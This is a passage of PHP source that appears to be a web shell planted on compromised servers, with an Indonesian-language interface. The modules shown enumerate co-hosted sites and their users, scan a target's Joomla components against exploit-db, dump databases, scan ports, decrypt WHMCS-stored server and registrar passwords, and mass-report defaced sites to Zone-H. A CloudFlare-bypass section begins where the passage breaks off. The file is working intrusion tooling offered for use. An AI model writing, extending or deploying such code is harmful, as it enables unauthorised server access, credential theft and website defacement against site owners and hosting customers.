\'http://xcode.or.id/files/Xcode12.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial16\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/Xcode13.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial17\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/files/Xcode14.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial18\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/Xcode15.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial19\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_16.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial20\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_17.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial21\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_18.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial22\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_19.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial23\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_20.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial024\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://xcode.or.id/xcode_magazine_21.zip\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\t\r\n\t\telseif ( $pilih == \'tutorial24\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/hacking_exposed_5.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial25\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/internet_denial_of_service.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial26\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/computer_viruses_for_dummies.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial27\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/hack_attacks_testing.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial28\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/secrets_of_super_hacker.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial29\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/stealing_network_how_to_own_shadow.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial30\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://www.insecure.in/ebooks/webapp_hackers_handbook.rar\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'ddd\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://199.91.153.95/t8dni7k639hg/3o321lcwwk8u5bh/Open_Source_Security_Tools.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'tutorial31\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://205.196.121.149/sg22hm8qjbhg/afsa7ibbk4ny2kd/Mobile_Malware_Attacks_and_Defense.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'cryptography_for_defeloper\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://205.196.121.248/0sod33qw66ug/wypyz555sc9bn7h/Cryptography_for_Developers.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'forensic\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://205.196.120.85/uisebgmioyjg/6l70l00ba9yoksq/CD_and_DVD_Forensics.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n\t\telseif ( $pilih == \'metasploit\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://199.91.153.192/3t115p2f6gvg/zvrrddmq6icqtd2/Metasploit_Toolkit.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}elseif ( $pilih == \'stealing_network\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://205.196.123.138/wbsxltb8rbtg/5vm8a1d23i9zje3/Stealing_the_Network_-_How_to_Own_the_Box.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}elseif ( $pilih == \'security_polices\') {\r\n\t\t\t?>\r\n\t\t\t<script>\r\n\t\t\t\tdocument.location = \'http://199.91.153.73/6le01f562ehg/6l5ep021dhvlhlq/Creating_Security_Policies_and_Implementing_Identity_Management_with_Active_Directory.pdf\';\r\n\t\t\t</script>\r\n\t\t\t<?php\r\n\t\t}\r\n}\r\n\r\n}\r\n////////////////////////////////////////////////////////////////////\r\n\r\n//////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'cms_detect\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=cms_detect" method="post">\r\n\t<br><br><br><br><center><b><font size=4>+--=[ CMS Detector ]=--+</font></b></center><br><br>\r\n    <?php\r\nif(!file_exists(\'pee.tmp\')){\r\n@fopen(\'pee.tmp\', \'w\');\r\n\r\necho\'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">\';\r\necho\'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table>\';\r\n\r\n$p = 0;\r\n\r\nif(is_readable("/var/named")){\r\n$list = scandir("/var/named");\r\n$current_dir = posix_getcwd();\r\n$dir = explode("/",$current_dir);\r\nforeach($list as $domain){\r\nif(strpos($domain,".db"))\r\n{\r\n\t$domain = str_replace(\'.db\',\'\',$domain);\r\n\t$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));\r\n\t\r\nerror_reporting(0);\r\n\r\n$link = $pageURL.\'pee/\'.$owner[\'name\'];\r\n\r\ncms_add($link,$domain,$owner[\'name\'],"WordPress");\r\ncms_add($link,$domain,$owner[\'name\'],"Joomla");\r\ncms_add($link,$domain,$owner[\'name\'],"vBulletin");\r\ncms_add($link,$domain,$owner[\'name\'],"WHMCS");\r\ncms_add($link,$domain,$owner[\'name\'],"PhpBB");\r\ncms_add($link,$domain,$owner[\'name\'],"MyBB");\r\ncms_add($link,$domain,$owner[\'name\'],"IPB");\r\ncms_add($link,$domain,$owner[\'name\'],"SMF");\r\ncms_add($link,$domain,$owner[\'name\'],"Drupal");\r\ncms_add($link,$domain,$owner[\'name\'],"e107");\r\ncms_add($link,$domain,$owner[\'name\'],"Seditio");\r\ncms_add($link,$domain,$owner[\'name\'],"osCommerce");\r\n\r\n}\r\n}\r\n}\r\n}else{\r\necho\'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">\';\r\necho\'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table><br><br>\';\r\n$content = file_get_contents($pageURL.\'pee.tmp\');\r\necho $content;\r\n}\r\n}\r\n/////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jss\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=jss" method="post">\r\n    <?php\r\n\techo \'\r\n\r\n<br><br><br><p align="center"><b><font size="3">Enter Targeting IP</font></b></p><br>\r\n<form method="POST">\r\n        <p align="center"><input type="text" class="inputz" name="site" size="65"><input class="inputzbut" type="submit" value="Scan"></p>\r\n</form><center>\r\n\r\n\';\r\n@set_time_limit(0);\r\n@error_reporting(E_ALL | E_NOTICE);\r\n \r\nfunction check_exploit($comxx){\r\n \r\n$link ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$comxx&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";\r\n \r\n$result = @file_get_contents($link);\r\n \r\nif (eregi("No results",$result))  {\r\n \r\necho"<td>Not Found</td><td><a href=\'http://www.google.com/#hl=en&q=download+$comxx+joomla+extension\'>Download</a></td></tr>";\r\n \r\n}else{\r\n \r\necho"<td><a href=\'$link\'>Found</a></td><td><=</td></tr>";\r\n \r\n}\r\n}\r\n \r\nfunction check_com($url){\r\n \r\n$source = @file_get_contents($url);\r\n \r\npreg_match_all(\'{option,(.*?)/}i\',$source,$f);\r\npreg_match_all(\'{option=(.*?)(&amp;|&|")}i\',$source,$f2);\r\npreg_match_all(\'{/components/(.*?)/}i\',$source,$f3);\r\n \r\n$arz=array_merge($f2[1],$f[1],$f3[1]);\r\n \r\n$coms=array();\r\n \r\nforeach(array_unique($arz) as $x){\r\n$coms[]=$x;\r\n}\r\n \r\nforeach($coms as $comm){\r\n \r\necho "<tr><td>$comm</td>";\r\ncheck_exploit($comm);\r\n}\r\n \r\n}\r\n \r\nfunction sec($site){\r\npreg_match_all(\'{http://(.*?)(/index.php)}siU\',$site, $sites);\r\nif(eregi("www",$sites[0][0])){\r\nreturn $site=str_replace("index.php","",$sites[0][0]);\r\n}else{\r\nreturn $site=str_replace("http://","http://www.",str_replace("index.php","",$sites[0][0]));\r\n}}\r\n \r\n$npages = 50000;\r\n \r\nif ($_POST)\r\n{\r\n  $ip = trim(strip_tags($_POST[\'site\']));\r\n  $npage = 1;\r\n  $allLinks = array();\r\n \r\n \r\n   while($npage <= $npages)\r\n  {\r\n \r\n  $x=@file_get_contents(\'http://www.bing.com/search?q=ip%3A\' . $ip . \'+index.php?option=com&first=\' . $npage);\r\n \r\n \r\n        if ($x)\r\n        {\r\n                preg_match_all(\'(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>siU\', $x, $findlink);\r\n              \r\n                foreach ($findlink[1] as $fl)\r\n              \r\n                $allLinks[]=sec($fl);\r\n              \r\n              \r\n                $npage = $npage + 10;\r\n              \r\n                if (preg_match(\'(first=\' . $npage . \'&amp)siU\', $x, $linksuiv) == 0)\r\n                        break;                    \r\n        }\r\n      \r\n    else\r\n                break;\r\n  }\r\n \r\n \r\n$allDmns = array();\r\n \r\nforeach ($allLinks as $kk => $vv){\r\n \r\n$allDmns[] = $vv;\r\n}\r\n                      \r\necho\'<table border="1"  width=\\"80%\\" align=\\"center\\">\r\n<tr><td width=\\"30%\\"><b>Server IP&nbsp;&nbsp;&nbsp;&nbsp; : </b></td><td><b>\'.$ip.\'</b></td></tr>                    \r\n<tr><td width=\\"30%\\"><b>Sites Found&nbsp; : </b></td><td><b>\'.count(array_unique($allDmns)).\'</b></td></tr>\r\n</table>\';\r\necho "<br><br>";\r\n \r\necho\'<table border="1" width="80%" align=\\"center\\">\';\r\n \r\nforeach(array_unique($allDmns) as $h3h3){\r\n \r\necho\'<tr id=new><td><b><a href=\'.$h3h3.\'>\'.$h3h3.\'</a></b></td><td><b>Exploit-db</b></td><td><b>challenge of Exploiting ..!</b></td></tr>\';\r\n \r\ncheck_com($h3h3);\r\n \r\n}\r\n \r\necho"</table>";\r\n \r\n}\r\n}\r\n/////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'dump\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=dump" method="post">\r\n    <?php\r\necho $head.\'<p align="center">\';\r\necho \'\r\n<table width=371 class=tabnet >\r\n<tr><th colspan="2">Database Dump</th></tr>\r\n<tr>\r\n\t<td>Server </td>\r\n\t<td><input class="inputz" type=text name=server size=52></td></tr><tr>\r\n\t<td>Username</td>\r\n\t<td><input class="inputz" type=text name=username size=52></td></tr><tr>\r\n\t<td>Password</td>\r\n\t<td><input class="inputz" type=text name=password size=52></td></tr><tr>\r\n\t<td>DataBase Name</td>\r\n\t<td><input class="inputz" type=text name=dbname size=52></td></tr>\r\n\t<tr>\r\n\t<td>DB Type </td>\r\n\t<td><form method=post action="\'.$me.\'">\r\n\t<select class="inputz" name=method>\r\n\t\t<option  value="gzip">Gzip</option>\r\n\t\t<option value="sql">Sql</option>\r\n\t\t</select>\r\n\t<input class="inputzbut" type=submit value="  Dump!  " ></td></tr>\r\n\t</form></center></table>\';\r\nif ($_POST[\'username\'] && $_POST[\'dbname\'] && $_POST[\'method\']){\r\n$date = date("Y-m-d");\r\n$dbserver = $_POST[\'server\'];\r\n$dbuser = $_POST[\'username\'];\r\n$dbpass = $_POST[\'password\'];\r\n$dbname = $_POST[\'dbname\'];\r\n$file = "Dump-$dbname-$date";\r\n$method = $_POST[\'method\'];\r\nif ($method==\'sql\'){\r\n$file="Dump-$dbname-$date.sql";\r\n$fp=fopen($file,"w");\r\n}else{\r\n$file="Dump-$dbname-$date.sql.gz";\r\n$fp = gzopen($file,"w");\r\n}\r\nfunction write($data) {\r\nglobal $fp;\r\nif ($_POST[\'method\']==\'ssql\'){\r\nfwrite($fp,$data);\r\n}else{\r\ngzwrite($fp, $data);\r\n}}\r\nmysql_connect ($dbserver, $dbuser, $dbpass);\r\nmysql_select_db($dbname);\r\n$tables = mysql_query ("SHOW TABLES");\r\nwhile ($i = mysql_fetch_array($tables)) {\r\n    $i = $i[\'Tables_in_\'.$dbname];\r\n    $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));\r\n    write($create[\'Create Table\'].";\\n\\n");\r\n    $sql = mysql_query ("SELECT * FROM ".$i);\r\n    if (mysql_num_rows($sql)) {\r\n        while ($row = mysql_fetch_row($sql)) {\r\n            foreach ($row as $j => $k) {\r\n                $row[$j] = "\'".mysql_escape_string($k)."\'";\r\n            }\r\n            write("INSERT INTO $i VALUES(".implode(",", $row).");\\n");\r\n        }\r\n    }\r\n}\r\nif ($method==\'ssql\'){\r\nfclose ($fp);\r\n}else{\r\ngzclose($fp);}\r\nheader("Content-Disposition: attachment; filename=" . $file);   \r\nheader("Content-Type: application/download");\r\nheader("Content-Length: " . filesize($file));\r\nflush();\r\n\r\n$fp = fopen($file, "r");\r\nwhile (!feof($fp))\r\n{\r\n    echo fread($fp, 65536);\r\n    flush();\r\n} \r\nfclose($fp); \r\n}\r\n\r\n}\r\n/////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'port-sc\'))\r\n    {\r\n    ?>\r\n    <form action="?y=<?php echo $pwd; ?>&x=port-sc" method="post">\r\n    <?php\r\n    echo \'<br><br><center><br><b>+--=[ Port Scanner ]=--+</b><br>\';\r\n    $start = strip_tags($_POST[\'start\']);\r\n    $end = strip_tags($_POST[\'end\']);\r\n    $host = strip_tags($_POST[\'host\']);\r\n    if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){\r\n    for($i = $start; $i<=$end; $i++){\r\n    $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n    if($fp){\r\n    echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n    }\r\n    flush();\r\n    }\r\n    }else{\r\n    echo \'<table class=tabnet style="width:300px;padding:0 1px;">\r\n   <input type="hidden" name="y" value="phptools">\r\n   <tr><th colspan="5">Port Scanner</th></center></tr>\r\n   <tr>\r\n\t\t<td>Host</td>\r\n\t\t<td><input type="text" class="inputz"  style="width:220px;color:#00ff00;" name="host" value="localhost"/></td>\r\n   </tr>\r\n   <tr>\r\n\t\t<td>Port start</td>\r\n\t\t<td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="start" value="0"/></td>\r\n   </tr>\r\n\t<tr><td>Port end</td>\r\n\t\t<td><input type="text" class="inputz"  style="width:220px;color:#00ff00;" name="end" value="5000"/></td>\r\n   </tr><td><input class="inputzbut" type="submit" style="color:#00ff00" value="Scan Ports" />\r\n   </td></form></center></table>\';\r\n    }\r\n}\r\n/////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'hash\'))\r\n    {\r\n$submit= $_POST[\'enter\'];\r\nif (isset($submit)) {\r\n$pass = $_POST[\'password\']; // password\r\n$salt = \'}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN\'; // random string\r\n$hash = md5($pass); // md5 hash #1\r\n$md4 = hash("md4",$pass);\r\n$hash_md5 = md5($salt.$pass); // md5 hash with salt #2\r\n$hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3\r\n$hash1 = sha1($pass); // sha1 hash #4\r\n$sha256 = hash("sha256",$text);\r\n$hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5\r\n$hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6\r\n}\r\necho \'<form action="" method="post"><b><table class=tabnet>\';\r\necho \'<tr><th colspan="2">Password Hash</th></center></tr>\';\r\necho \'<tr><td><b>masukan kata yang ingin di encrypt:</b></td>\';\r\necho \'<td><input class="inputz" type="text" name="password" size="40" />\';\r\necho \'<input class="inputzbut" type="submit" name="enter" value="hash" />\';\r\necho \'</td></tr><br>\';\r\necho \'<tr><th colspan="2">Hasil Hash</th></center></tr>\';\r\necho \'<tr><td>Original Password</td><td><input class=inputz type=text size=50 value=\'.$pass.\'></td></tr><br><br>\';\r\necho \'<tr><td>MD5</td><td><input class=inputz type=text size=50 value=\'.$hash.\'></td></tr><br><br>\';\r\necho \'<tr><td>MD4</td><td><input class=inputz type=text size=50 value=\'.$md4.\'></td></tr><br><br>\';\r\necho \'<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value=\'.$hash_md5.\'></td></tr><br><br>\';\r\necho \'<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value=\'.$hash_md5_double.\'></td></tr><br><br>\';\r\necho \'<tr><td>Sha1</td><td><input class=inputz type=text size=50 value=\'.$hash1.\'></td></tr><br><br>\';\r\necho \'<tr><td>Sha256</td><td><input class=inputz type=text size=50 value=\'.$sha256.\'></td></tr><br><br>\';\r\necho \'<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value=\'.$hash1_sha1.\'></td></tr><br><br>\';\r\necho \'<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value=\'.$hash1_sha1_double.\'></td></tr><br><br></table>\'; \r\n}\r\n\r\n/////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'whmcs\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=whmcs" method="post">\r\n\r\n<?php\r\n\r\nfunction decrypt ($string,$cc_encryption_hash)\r\n{\r\n    $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);\r\n    $hash_key = _hash ($key);\r\n    $hash_length = strlen ($hash_key);\r\n    $string = base64_decode ($string);\r\n    $tmp_iv = substr ($string, 0, $hash_length);\r\n    $string = substr ($string, $hash_length, strlen ($string) - $hash_length);\r\n    $iv = $out = \'\';\r\n    $c = 0;\r\n    while ($c < $hash_length)\r\n    {\r\n        $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));\r\n        ++$c;\r\n    }\r\n    $key = $iv;\r\n    $c = 0;\r\n    while ($c < strlen ($string))\r\n    {\r\n        if (($c != 0 AND $c % $hash_length == 0))\r\n        {\r\n            $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));\r\n        }\r\n        $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));\r\n        ++$c;\r\n    }\r\n    return $out;\r\n}\r\n\r\nfunction _hash ($string)\r\n{\r\n    if (function_exists (\'sha1\'))\r\n    {\r\n        $hash = sha1 ($string);\r\n    }\r\n    else\r\n    {\r\n        $hash = md5 ($string);\r\n    }\r\n    $out = \'\';\r\n    $c = 0;\r\n    while ($c < strlen ($hash))\r\n    {\r\n        $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));\r\n        $c += 2;\r\n    }\r\n    return $out;\r\n}\r\n\r\necho "\r\n<br><center><font size=\'5\' color=\'#00ff00\'><b>-=[ WHMCS Decoder ]=-</b></font></center>\r\n<center>\r\n<br>\r\n\r\n<FORM action=\'\'  method=\'post\'>\r\n<input type=\'hidden\' name=\'form_action\' value=\'2\'>\r\n<br>\r\n<table class=tabnet style=width:320px;padding:0 1px;>\r\n<tr><th colspan=2>WHMCS Decoder</th></tr> \r\n<tr><td>db_host </td><td><input type=\'text\' style=\'color:#00ff00;background-color:\' class=\'inputz\' size=\'38\' name=\'db_host\' value=\'localhost\'></td></tr>\r\n<tr><td>db_username </td><td><input type=\'text\' style=\'color:#00ff00;background-color:\' class=\'inputz\' size=\'38\' name=\'db_username\' value=\'\'></td></tr>\r\n<tr><td>db_password</td><td><input type=\'text\' style=\'color:#00ff00;background-color:\' class=\'inputz\' size=\'38\' name=\'db_password\' value=\'\'></td></tr>\r\n<tr><td>db_name</td><td><input type=\'text\' style=\'color:#00ff00;background-color:\' class=\'inputz\' size=\'38\' name=\'db_name\' value=\'\'></td></tr>\r\n<tr><td>cc_encryption_hash</td><td><input style=\'color:#00ff00;background-color:\' type=\'text\' class=\'inputz\' size=\'38\' name=\'cc_encryption_hash\' value=\'\'></td></tr>\r\n<td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class=\'inputzbut\' type=\'submit\' style=\'color:#00ff00;background-color:\'  value=\'Submit\' name=\'Submit\'></td>\r\n</table>\r\n</FORM>\r\n</center>\r\n";\r\n\r\n if($_POST[\'form_action\'] == 2 )\r\n {\r\n //include($file);\r\n $db_host=($_POST[\'db_host\']);\r\n $db_username=($_POST[\'db_username\']);\r\n $db_password=($_POST[\'db_password\']);\r\n $db_name=($_POST[\'db_name\']);\r\n $cc_encryption_hash=($_POST[\'cc_encryption_hash\']);\r\n\r\n\r\n\r\n    $link=mysql_connect($db_host,$db_username,$db_password) ;\r\n        mysql_select_db($db_name,$link) ;\r\n$query = mysql_query("SELECT * FROM tblservers");\r\nwhile($v = mysql_fetch_array($query)) {\r\n$ipaddress = $v[\'ipaddress\'];\r\n$username = $v[\'username\'];\r\n$type = $v[\'type\'];\r\n$active = $v[\'active\'];\r\n$hostname = $v[\'hostname\'];\r\necho("<center><table border=\'1\'>");\r\n$password = decrypt ($v[\'password\'], $cc_encryption_hash);\r\necho("<tr><td>Type</td><td>$type</td></tr>");\r\necho("<tr><td>Active</td><td>$active</td></tr>");\r\necho("<tr><td>Hostname</td><td>$hostname</td></tr>");\r\necho("<tr><td>Ip</td><td>$ipaddress</td></tr>");\r\necho("<tr><td>Username</td><td>$username</td></tr>");\r\necho("<tr><td>Password</td><td>$password</td></tr>");\r\n\r\necho "</table><br><br></center>";\r\n}\r\n\r\n    $link=mysql_connect($db_host,$db_username,$db_password) ;\r\n        mysql_select_db($db_name,$link) ;\r\n$query = mysql_query("SELECT * FROM tblregistrars");\r\necho("<center>Domain Reseller <br><table class=tabnet border=\'1\'>");\r\necho("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");\r\nwhile($v = mysql_fetch_array($query)) {\r\n$registrar     = $v[\'registrar\'];\r\n$setting = $v[\'setting\'];\r\n$value = decrypt ($v[\'value\'], $cc_encryption_hash);\r\nif ($value=="") {\r\n$value=0;\r\n}\r\n$password = decrypt ($v[\'password\'], $cc_encryption_hash);\r\necho("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");\r\n}\r\n}\r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'zone\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=zone" method="post">\r\n\r\n<br><br><center>\r\n<!-- Zone-H -->\r\n<form action="" method=\'POST\'><table><table class=\'tabnet\'><tr>\r\n<td style=\'background-color:#0000;padding-left:10px;\'><tr><tr><th colspan="2"><h2>Zone-H Defacer</h2></th></tr></td></tr><tr><td height=\'45\' colspan=\'2\'><form method="post">\r\n<input type="text" class="inputz" name="defacer" value="Nama Defacer" />\r\n<select name="hackmode" class="inputz" >\r\n<option >------------------------Pilih Salah Satu------------------------</option>\r\n<option value="1">known vulnerability (i.e. unpatched system)</option>\r\n<option value="2" >undisclosed (new) vulnerability</option>\r\n<option value="3" >configuration / admin. mistake</option>\r\n<option value="4" >brute force attack</option>\r\n<option value="5" >social engineering</option>\r\n<option value="6" >Web Server intrusion</option>\r\n<option value="7" >Web Server external module intrusion</option>\r\n<option value="8" >Mail Server intrusion</option>\r\n<option value="9" >FTP Server intrusion</option>\r\n<option value="10" >SSH Server intrusion</option>\r\n<option value="11" >Telnet Server intrusion</option>\r\n<option value="12" >RPC Server intrusion</option>\r\n<option value="13" >Shares misconfiguration</option>\r\n<option value="14" >Other Server intrusion</option>\r\n<option value="15" >SQL Injection</option>\r\n<option value="16" >URL Poisoning</option>\r\n<option value="17" >File Inclusion</option>\r\n<option value="18" >Other Web Application bug</option>\r\n<option value="19" >Remote administrative panel access bruteforcing</option>\r\n<option value="20" >Remote administrative panel access password guessing</option>\r\n<option value="21" >Remote administrative panel access social engineering</option>\r\n<option value="22" >Attack against administrator(password stealing/sniffing)</option>\r\n<option value="23" >Access credentials through Man In the Middle attack</option>\r\n<option value="24" >Remote service password guessing</option>\r\n<option value="25" >Remote service password bruteforce</option>\r\n<option value="26" >Rerouting after attacking the Firewall</option>\r\n<option value="27" >Rerouting after attacking the Router</option>\r\n<option value="28" >DNS attack through social engineering</option>\r\n<option value="29" >DNS attack through cache poisoning</option>\r\n<option value="30" >Not available</option>\r\n</select>\r\n\r\n<select name="reason" class="inputz" >\r\n<option >-------------Pilih Salah Satu---------------</option>\r\n<option value="1" >Heh...just for fun!</option>\r\n<option value="2" >Revenge against that website</option>\r\n<option value="3" >Political reasons</option>\r\n<option value="4" >As a challenge</option>\r\n<option value="5" >I just want to be the best defacer</option>\r\n<option value="6" >Patriotism</option>\r\n<option value="7" >Not available</option>\r\n</select>\r\n<input type="hidden" name="action" value="zone">\r\n<center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains">List Of Domains</textarea>\r\n<br /><input class=\'inputzbut\' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>\r\n</form></td></tr></table></form>\r\n<!-- End Of Zone-H -->\r\n</td></center><br><br>\r\n\r\n<?php\r\necho \'<center>\';\r\n\tob_start();\r\n\t$sub = get_loaded_extensions();\r\n\tif(!in_array("curl", $sub)){die(\'[-] Curl Is Not Supported !! \');}\r\n\t$hacker = $_POST[\'defacer\'];\r\n\t$method = $_POST[\'hackmode\'];\r\n\t$neden = $_POST[\'reason\'];\r\n\t$site = $_POST[\'domain\'];\r\n\t\r\n\tif (empty($hacker)){die ("[-] You Must Fill the Attacker name !");}\r\n\telseif($method == "--------SELECT--------") {die("[-] You Must Select The Method !");}\r\n\telseif($neden == "--------SELECT--------") {die("[-] You Must Select The Reason");}\r\n\telseif(empty($site)) {die("[-] You Must Inter the Sites List ! ");}\r\n\t$i = 0;\r\n\t$sites = explode("\\n", $site);\r\n\twhile($i < count($sites)) \r\n\t{\r\n\t\tif(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];}\r\n\t\tZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);\r\n\t\techo "Site : ".$sites[$i]." Defaced !\\n";\r\n\t\t++$i;\r\n\t}\r\n\techo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";\r\n\r\n\techo \'</center>\';\r\n}\r\n\r\n/////////////////////////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'bypass-cf\'))\r\n{\t\r\necho \'\r\n<form method="POST"><br><br>\r\n<center><p align="center" dir="ltr"><b><font size="5" face="Tahoma">+--=[ Bypass\r\n<font color="#CC0000">CloudFlare</font> ]=--+</font></b></p>\r\n<select class="inputz" 